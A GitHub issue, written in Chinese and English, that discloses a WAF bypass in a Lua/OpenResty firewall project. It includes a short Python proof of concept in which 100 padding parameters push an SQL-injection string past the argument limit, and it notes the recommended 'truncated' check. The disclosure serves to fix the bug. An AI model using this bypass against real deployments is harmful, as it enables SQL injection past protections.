Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

args block can be bypassed because of the lack of error handle #218

Open
vulntor opened this issue Dec 9, 2018 · 3 comments
Open

args block can be bypassed because of the lack of error handle #218

vulntor opened this issue Dec 9, 2018 · 3 comments

Comments

@vulntor
Copy link

vulntor commented Dec 9, 2018

get_post_args 和 get_uri_args 默认只取前100个参数。
如果攻击者提交100个无用参数,再接上注入的参数,将绕过waf。
漏洞证明python脚本:

import requests
args='a=1'+'&a=1'*99
sqli='b=select*from'
r1 = requests.get('http://127.0.0.1/?'+sqli)
print r1.url
print r1.status_code
#返回403
r2 = requests.get('http://127.0.0.1/?'+args+'&'+sqli)
print r2.url
print r2.status_code
#返回200

官方建议是使用以下代码拒绝参数过多的请求

local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
 end
@vulntor vulntor changed the title 缺少错误处理导致waf可以被绕过 args block can be bypassed because of the lack of error handle Dec 9, 2018
@vulntor
Copy link
Author

vulntor commented Dec 9, 2018

get_post_args and get_uri_args will only return 100 args by default
If attacker add 100 args before actual attack argument,waf will be bypassed。
POC in python:

import requests
args='a=1'+'&a=1'*99
sqli='b=select*from'
r1 = requests.get('http://127.0.0.1/?'+sqli)
print r1.url
print r1.status_code
#403
r2 = requests.get('http://127.0.0.1/?'+args+'&'+sqli)
print r2.url
print r2.status_code
#200

The official doc's advice is to use the following code to rejected the request。

local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
 end

@alexazhou
Copy link
Owner

alexazhou commented Feb 1, 2019

多谢,这确实是个漏洞,欢迎你提交 pr 来修复,或者我过段时间不忙了会来修复这个

@Ofirnir123
Copy link

Is this issue already fixed ?
Kind regards!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants